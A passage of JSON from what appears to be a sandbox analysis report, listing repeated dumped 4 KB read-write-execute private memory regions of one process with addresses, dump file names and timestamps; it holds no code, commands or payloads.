"timestamp": "00:01:39.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001173-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_287", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1173", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.262", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001176-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1176", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.264", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001179-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1179", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.267", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001181-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1181", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.268", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001182-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1182", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.271", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001184-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1184", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.272", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001185-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1185", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.276", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001188-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1188", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.278", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001191-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1191", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.281", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001194-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_308", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1194", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.284", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001196-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_310", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1196", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.284", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001197-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_311", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1197", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.286", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001199-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_313", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1199", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.287", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001200-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_314", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1200", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.290", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001203-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_317", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1203", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001205-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_319", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1205", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.295", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001206-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_320", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1206", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.296", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001209-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_323", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1209", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.299", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001212-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_326", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1212", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.303", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001215-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_329", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1215", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.307", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001218-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_332", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1218", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.310", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001220-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_334", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1220", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.312", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001221-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_335", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1221", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.313", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001223-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_337", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1223", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001224-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_338", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1224", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.316", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001227-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_341", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1227", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.319", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001230-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_344", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1230", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.322", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001233-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_347", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1233", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.324", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001235-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_349", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1235", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.325", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001236-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_350", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1236", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.326", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001238-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_352", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1238", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.328", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001239-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_353", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1239", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001241-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_355", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1241", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.330", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001242-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_356", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1242", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.331", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001244-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_358", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1244", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.332", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001245-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_359", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1245", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001247-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_361", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1247", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001248-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_362", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1248", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.336", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001250-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_364", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1250", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.337", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001251-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_365", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1251", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001254-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_368", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1254", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.341", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001257-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_371", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1257", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.343", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001259-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_373", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1259", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.344", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001260-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_374", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1260", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.345", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001262-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_376", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1262", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001263-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_377", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1263", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.348", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001265-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_379", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1265", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.349", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001266-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_380", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1266", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.350", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001268-addr_0x0000000000070000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_382", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1268", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:01:39.352", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001269-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_383", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1269", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:39.354", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001272-addr_0x0000000000020000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], 